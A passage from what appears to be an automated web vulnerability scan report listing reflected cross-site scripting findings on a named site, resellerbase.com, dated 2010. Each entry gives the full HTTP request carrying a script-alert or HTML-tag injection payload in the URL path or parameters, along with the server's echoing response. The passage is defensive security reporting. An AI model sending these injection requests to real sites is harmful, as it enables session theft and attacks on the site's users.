The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b1eaf<script>alert(1)</script>57028d27d5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /other/search.phpb1eaf<script>alert(1)</script>57028d27d5f?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:54:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /other/search.phpb1eaf<script>alert(1)</script>57028d27d5f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3953. http://www.resellerbase.com/other/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /other/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 8bfe3<a>4f60ab2e166 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /other/search.php?keyword=search...&Submit3=Search8bfe3<a>4f60ab2e166&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /other/search.php?keyword=search...&Submit3=Search8bfe3<a>4f60ab2e166&opt=2 was not found on this server.</p>
...[SNIP]...

2.3954. http://www.resellerbase.com/other/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /other/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5601b<a>7d31404df7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /other/search.php?keyword=search...5601b<a>7d31404df7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /other/search.php?keyword=search...5601b<a>7d31404df7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3955. http://www.resellerbase.com/other/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /other/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5f2eb<script>alert(1)</script>c386089d99d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /other/search.php?keyword=search...&Submit3=Search&opt=2&5f2eb<script>alert(1)</script>c386089d99d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /other/search.php?keyword=search...&Submit3=Search&opt=2&5f2eb<script>alert(1)</script>c386089d99d=1 was not found on this server.</p>
...[SNIP]...

2.3956. http://www.resellerbase.com/other/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /other/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 36cbc<a>b5acf97596b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /other/search.php?keyword=search...&Submit3=Search&opt=236cbc<a>b5acf97596b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /other/search.php?keyword=search...&Submit3=Search&opt=236cbc<a>b5acf97596b was not found on this server.</p>
...[SNIP]...

2.3957. http://www.resellerbase.com/pick.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /pick.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2829b<script>alert(1)</script>2bf52814a73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pick.php2829b<script>alert(1)</script>2bf52814a73 HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /pick.php2829b<script>alert(1)</script>2bf52814a73 was not found on this server.</p>
...[SNIP]...

2.3958. http://www.resellerbase.com/power_search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /power_search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dbb11<script>alert(1)</script>c343095c208 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /power_search.phpdbb11<script>alert(1)</script>c343095c208 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /power_search.phpdbb11<script>alert(1)</script>c343095c208 was not found on this server.</p>
...[SNIP]...

2.3959. http://www.resellerbase.com/power_search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /power_search.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdaa5"><script>alert(1)</script>cc97264412c994d9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /power_search.phpbdaa5"><script>alert(1)</script>cc97264412c994d9e?features%255b%255d=2&cat=7&title=555-555-0199@example.com&price=555-555-0199@example.com&email=wiener@example.com&contact_name=Peter%2bWiener&pflag=search&submit=Search&url=555-555-0199@example.com&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/power_search.php?features%255b%255d=2&cat=7&title=555-555-0199@example.com&price=555-555-0199@example.com&email=wiener@example.com&contact_name=Peter%2bWiener&pflag=search&submit=Search&url=555-555-0199@example.com
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:02:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/power_search.phpbdaa5"><script>alert(1)</script>cc97264412c994d9e?features%255b%255d=2&cat=7&title=555-555-0199@example.com&price=555-555-0199@example.com&email=wiener@example.com&contact_name=Peter%2bWiener&pflag=search&submit=Search&url=555-555-0199@example.com&so
...[SNIP]...

2.3960. http://www.resellerbase.com/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b340<script>alert(1)</script>da0096006a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rating.php3b340<script>alert(1)</script>da0096006a1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:13:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /rating.php3b340<script>alert(1)</script>da0096006a1 was not found on this server.</p>
...[SNIP]...

2.3961. http://www.resellerbase.com/register.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /register.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bf301<script>alert(1)</script>1321ca1ab3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.phpbf301<script>alert(1)</script>1321ca1ab3f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /register.phpbf301<script>alert(1)</script>1321ca1ab3f was not found on this server.</p>
...[SNIP]...

2.3962. http://www.resellerbase.com/resources-information/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7e6dc<script>alert(1)</script>1170c37eb27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information7e6dc<script>alert(1)</script>1170c37eb27/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information7e6dc<script>alert(1)</script>1170c37eb27/ was not found on this server.</p>
...[SNIP]...

2.3963. http://www.resellerbase.com/resources-information/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 44bda<script>alert(1)</script>27e20d4c9be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/?44bda<script>alert(1)</script>27e20d4c9be=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/?44bda<script>alert(1)</script>27e20d4c9be=1 was not found on this server.</p>
...[SNIP]...

2.3964. http://www.resellerbase.com/resources-information/ [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload a20ca<a>06ee3588317 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fa20ca<a>06ee3588317 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fa20ca<a>06ee3588317 was not found on this server.</p>
...[SNIP]...

2.3965. http://www.resellerbase.com/resources-information/ebooks/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9e048<script>alert(1)</script>d9ab180d61a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information9e048<script>alert(1)</script>d9ab180d61a/ebooks/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information9e048<script>alert(1)</script>d9ab180d61a/ebooks/ was not found on this server.</p>
...[SNIP]...

2.3966. http://www.resellerbase.com/resources-information/ebooks/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7cd1a<script>alert(1)</script>4c930e7cd40300a4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /resources-information7cd1a<script>alert(1)</script>4c930e7cd40300a4e/ebooks/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information7cd1a<script>alert(1)</script>4c930e7cd40300a4e/ebooks/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.3967. http://www.resellerbase.com/resources-information/ebooks/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 63a65<script>alert(1)</script>10dc62652b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks63a65<script>alert(1)</script>10dc62652b7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks63a65<script>alert(1)</script>10dc62652b7/ was not found on this server.</p>
...[SNIP]...

2.3968. http://www.resellerbase.com/resources-information/ebooks/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc815<script>alert(1)</script>014d53e4fa3723b0c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /resources-information/ebooksfc815<script>alert(1)</script>014d53e4fa3723b0c/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooksfc815<script>alert(1)</script>014d53e4fa3723b0c/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.3969. http://www.resellerbase.com/resources-information/ebooks/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ec7f8<script>alert(1)</script>a4648cd2e5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/?ec7f8<script>alert(1)</script>a4648cd2e5c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/?ec7f8<script>alert(1)</script>a4648cd2e5c=1 was not found on this server.</p>
...[SNIP]...

2.3970. http://www.resellerbase.com/resources-information/ebooks/ [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload d3cb8<a>de5f2d7e1eb was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fd3cb8<a>de5f2d7e1eb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:15 GMT
